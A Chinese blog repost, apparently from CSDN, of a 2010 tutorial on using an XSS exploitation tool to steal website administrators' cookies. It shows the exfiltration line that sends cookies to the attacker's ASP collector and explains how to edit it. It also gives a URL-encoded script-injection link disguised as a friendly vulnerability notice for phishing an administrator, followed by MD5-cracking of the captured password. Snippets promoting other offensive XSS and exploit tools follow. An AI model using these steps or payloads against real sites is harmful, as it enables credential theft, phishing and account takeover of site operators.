牛B装备 XSS 漏洞利用工具[使用教程]

最新推荐文章于 2024-04-24 08:58:33 发布
最新推荐文章于 2024-04-24 08:58:33 发布
阅读量250 收藏
点赞数
文章标签: 人工智能
原文链接:http://www.cnblogs.com/fdsajhg30000/archive/2011/02/14/1954200.html
版权

牛B装备 XSS 漏洞利用工具[使用教程]

牛B装备 XSS 漏洞利用工具[使用教程]

 

作者:佚名  来源:本站整理  发布时间:2010-05-02 23:42:50 没人爱的猪 DJlyr
工具下载地址:http://www.7747.net/Soft/200912/16400.html
图片:

在工具中,最让人头疼的就是盗取cookie这个版面.绝对有许多人不知道怎么用.
现在就说一下流程吧.
把生成出来的JS和ASP文件放入空间的根目录中,如果你放的不是根目录,那么就需要修改JS文件.把

img.src = "http://www.7747.net/g.asp?key="+str; (把红色部分修改掉,在后面添加上自己的路径.)
然后找到JS的地址,如[http://www.7747.net/g.js]
<a href=跨站漏洞地址<script src=http://127.0.0.1/g.js>管理员您好,您的网站有漏洞</a>
在此是我们就把 <script src=http://127.0.0.1/g.js> 进行URL加密.
<a href=跨站漏洞地址%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%2F%67%2E%6A%73%3E>管理员您好,您的网站有漏洞</a>
最后把这个盗取连接发送给管理员,只要他点击.那么COOKIE就会自己保存到ASP文件夹中设置的.COOKIE.TXT(程序默认)的文本文件中.
打开保存有管理员 帐号 密码 的COOKIE 密码在进行MD5解密就可以了.
 原文地址:http://www.zzfhw.com/wenzhang/html/fangheishow-18559.html

分类:   9_1_XSS

转载于:https://www.cnblogs.com/fdsajhg30000/archive/2011/02/14/1954200.html

weixin_30412577
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali [BeEF-XSS]XSS利用工具
weixin_45253622的博客
03-29 4337
BeEF-XSS的使用 BEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 安装 linux安装 apt-get update apt-get install beef-xss 启动Apache并打开beef service apache2 start beef-xss #打开 打开beef需要设置密码,默认密码和用户名都为beef 第二个框是示例payloa
xss漏洞利用方式总结
zlloveyouforever的博客
10-13 2529
XSS漏洞利用方式简单总结。有问题的同学请私信我,文章中网页挂马这一部分确实比较难实现。 此平台优点:界面布局清新、数据可阅读性好、IP获取准确、IP地址定位精准、轻量级(无需数据库)、对数据存储进行加密、GitHub开源方便与开发者交流(生命周期长)。 可以看到,BlueLotus平台还提供了一些js模板,便于我们参考或者构
漏洞利用篇(上)
m0_57929980的博客
06-16 6965
漏洞利用篇:介绍漏洞利用的基本概念及示例,主要讲解Shellcode的编写与编码
推荐好用的XSS漏洞扫描利用工具
最新发布
heike_Ch的博客
04-24 954
toxssin 是一种开源渗透测试工具,可自动执行跨站脚本 (XSS) 漏洞利用过程。它由一个 https 服务器组成,它充当为该工具 (toxin.js) 提供动力的恶意 JavaScript 有效负载生成的流量的解释器。
CVE-2020-0796 漏洞利用教程
凝聚力安全团队
10-30 3056
目录漏洞描述影响版本漏洞检测漏洞利用蓝屏攻击远程代码执行本地提权修复建议 漏洞描述   Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞,也称为“ Windows SMBv3客户端/服务器远程执行代码漏洞”。 影响版本 适用于32位系统的Windows 10版本1903 Windows 10 1903版(用于基于ARM64的系统) Windows 10 1903版(用于基于x64的系统) 适用于32位系统的Windows 10版本1909 Windo
XSS详解及其利用方式
读书 买花 长大
11-14 3938
XSS-xss
JSP使用过滤器防止Xss漏洞
10-17
在Web开发中,XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
xsstry:xss漏洞利用平台
06-10
**XSS漏洞利用平台——深入理解XSS与CSS在安全中的角色** XSS(Cross Site Scripting)漏洞是一种常见的网络安全问题,它允许攻击者在受害者的浏览器上执行恶意脚本。"xsstry"是一个用于XSS漏洞测试和利用的平台,...
XSS漏洞挖掘及利用教程
07-31
XSS漏洞挖掘及利用教程】 XSS,全称为跨站脚本攻击(Cross-Site Scripting),是一种常见的网络安全漏洞,允许攻击者在用户的浏览器上注入恶意脚本。本教程将深入探讨XSS漏洞的挖掘和利用方法,通过实例解析其...
JSP安全开发之XSS漏洞详解
10-21
在JSP开发中,XSS(Cross Site Scripting)漏洞是一种常见的安全问题,它允许恶意攻击者通过在网页上注入可执行的脚本代码来操纵用户浏览器,进而对用户进行攻击。XSS攻击通常发生在服务器未能正确处理或验证用户...
扫描sql注入与xss攻击的b工具
11-02
扫描sql注射与xss攻击的b工具,适合新手初入渗透测试使用的工具,很好有效辅助你们对网站的渗透测试。
Windows漏洞利用开发系列教程第一部分:漏洞利用介绍
01-11
翻过国外的一个二进制漏洞学习教程, 非常适合刚学习漏洞的新人。
XSS漏洞测试工具
02-10
XSS是一种非常常见的漏洞类型,它的影响非常的广泛并且很容易的就能被检测到。 攻击者可以在未经验证的情况下,将不受信任的JavaScript片段插入到你的应用程序中,然后这个JavaScript将被访问目标站点的受害者执行
xss漏洞工具 -- xsser
weixin_41489908的博客
01-02 3438
深情的人一般会被嫌幼稚,懂事的人一般很穷,于是便把深情喂了狗,把懂事换了柴米油盐。。。 今天给大家介绍一款xss漏洞利用工具xsser 一、环境:kali19.4 python3 二、安装过程: 1、复制到本地安装包 git clone https://github.com/epsylon/xsser.git 2、安装依赖 cd xsser python3 setup.py install ...
xss攻击进阶篇---如何利用抓包工具Fiddler进行xss攻击
前端小工
11-12 1万+
最近对自己的项目进行了xss攻击,想找到还存在什么漏洞;玩着玩着玩上瘾了,顺手帮别人的网站做了测试,结果时,不费一兵一卒就轻易拿下;还可以进行CSRF攻击,攻击别人的帐号.xss的危害可小可大;比如弄一些恶作剧,弹出一些东西,大到恶意地操作别的帐号,做一下钓鱼的入口等等 什么是xss,什么csrf;在这里我们不去讨论;相关的知识点请看之前我写过的一篇文章XSS跨站脚本攻击与CSRF跨站请求伪造攻击的
米斯特白帽培训讲义 工具篇 BruteXSS
热门推荐
龙哥盟
12-22 3万+
米斯特白帽培训讲义 工具篇 BruteXSS 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 介绍BruteXSS 是一个非常强大和快速的跨站点脚本检测工具,可用于暴力注入参数。BruteXSS 从指定的词库加载多种有效载荷进行注入,并且使用指定的载荷和扫描检查这些存在 XSS 漏洞的参数。得益于非常强大的扫描功能,在执行任务时,BruteXSS
TamperIE - 一个小巧的XSS漏洞检测辅助工具
软件质量优化
01-21 1万+
有些开发人员喜欢在客户端进行用户输入的检查,这种方法其实是不安全的,因为跨站脚本攻击可以绕过客户端输入界面,利用一些工具来修改提交到服务器的字符串,从而达到跨站脚本攻击的目的。TamperIE就是此类的小工具之一(www.bayden.com)TamperIE安装后以插件的方式加载到IE浏览器中,监视IE浏览器与服务器之间的HTTP通信,截获提交到服务器的HTTP语句,修改其中的数
自己写的xss利用工具
风炫 致力于顶级网络安全专家
02-20 1019
怎么说呢,我也用过xssme,感觉的确不错。还可以共享。但是我感觉就如果你自己一个人想使用,那些功能未免太过冗余。所以我写了个相当于xssme中默认模块的一个工具给大家看下。以生成文件为保存方式。大勿喷。 window.onload = function () { var url = "http://127.0.0.1/test/js/jsbase/xss.php"; (fun

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值